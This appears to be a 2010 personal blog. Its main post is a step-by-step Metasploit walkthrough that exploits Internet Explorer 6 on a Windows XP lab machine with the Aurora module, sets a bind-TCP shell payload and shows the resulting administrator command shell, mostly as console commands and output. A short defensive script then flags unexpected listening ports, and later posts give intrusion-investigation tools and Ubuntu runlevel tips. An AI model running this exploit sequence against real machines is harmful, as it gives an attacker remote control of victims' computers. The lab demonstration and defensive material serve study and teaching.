The payload is a set of machine language instructions in the form of opcodes, which run on the processor and execute code of the attacker's choice.

The live demonstration was about exploiting IE 6 on a Windows XP SP2 box with the Aurora exploit (which, Google claims, was used by Chinese hackers for the recent attacks on their servers in China). I used the Metasploit Framework to develop the exploit quickly and set the parameters accordingly.

So, the following is everything I did while demonstrating it:

1. Started the Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf >


2. Searched for the 'aurora' string (as I knew such a keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...

Exploits
========

Name Rank Description
---- ---- -----------
windows/browser/ms10_002_aurora normal Internet Explorer "Aurora" Memory Corruption

msf >

3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >


4. Show the parameters to be set
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


5. Set server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the guest XP was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1


6. Set URIPATH to "/" for the convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /


7. And here comes the second part of the exploit, i.e. the payload. I set the payload to windows/shell/bind_tcp, which listens for a connection on the target and spawns a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


8. Finally, before you exploit the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.188.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)


Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.


10. Now open the URL on the victim's machine


11. In the console window, you can see one session has opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)


12. Interacting with the session by specifying the session number gives you...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>



..............Done!!!

Phheewww......

OMG, I wrote that all? ;;)
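Turning the last step around for the defender: a bind_tcp payload leaves a listening socket on the victim (LPORT 4444 above), which plain netstat shows. The script below is an added example, not from the post; it reads output in the layout of Windows `netstat -ano` (the sample is constructed, reusing the addresses from the session above) and reports TCP listeners whose port is not in an allowlist.

```shell
#!/bin/sh
# Added example: report TCP listeners outside an allowlist from netstat -ano style output.
# The sample is constructed to look like `netstat -ano` on the demo XP box; not a real capture.
NETSTAT_SAMPLE='  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       980
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1532
  TCP    192.168.188.138:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.188.138:4444   192.168.188.1:54460    ESTABLISHED     1532
  UDP    0.0.0.0:500            *:*                                    712'

# unexpected_listeners "PORT PORT ..."  < netstat-output
# Prints "port pid" for each TCP socket in LISTENING state whose port is not allowlisted.
# The same port/pid pair is printed once even if bound on several addresses.
unexpected_listeners() {
  awk -v allowed="$1" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "TCP" && $4 == "LISTENING" {
      port = $2; sub(/.*:/, "", port)      # keep only what follows the last colon
      key = port " " $5
      if (!(port in ok) && !(key in seen)) { seen[key] = 1; print key }
    }
  ' | sort -n
}

# Demo: RPC/SMB ports are expected on this box; the 4444 listener is not.
printf '%s\n' "$NETSTAT_SAMPLE" | unexpected_listeners "135 139 445"
```

The PID column lets you go from the flagged port to the owning process in Process Explorer or TCPView.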

Tuesday, March 23, 2010

the blog title...

I have always been keen on telling others about
"Keeping your own system secure before you go after others."
So, I just wanted to name a few tools which may help you investigate in case you feel like you have been infiltrated (you know what I mean :P)

Windows:
-TCPView
-Process Explorer
-Process Monitor

There is also a common command line tool, netstat, in Windows as well as in Linux.
A network sniffer like Wireshark can also do a lot to aid.

Remove service from startup (Ubuntu)...

To remove an unwanted application from the system boot sequence (all the services reside in the /etc/init.d/ folder), run the command as follows...

sudo update-rc.d <service-name> remove

Changing default runlevel in Ubuntu...

-Edit /etc/init/rc-sysinit.conf using your favourite editor (mine is nano ;))
-Find env DEFAULT_RUNLEVEL, which should be set to 2 by default.
-Change it to your desired runlevel.
-Reboot and you are done!

Here is a quick reference.
Debian Linux runlevels
ID   Description
0    Halt
1    Single-User mode
2-5  Full Multi-User with console logins and display manager if installed
6    Reboot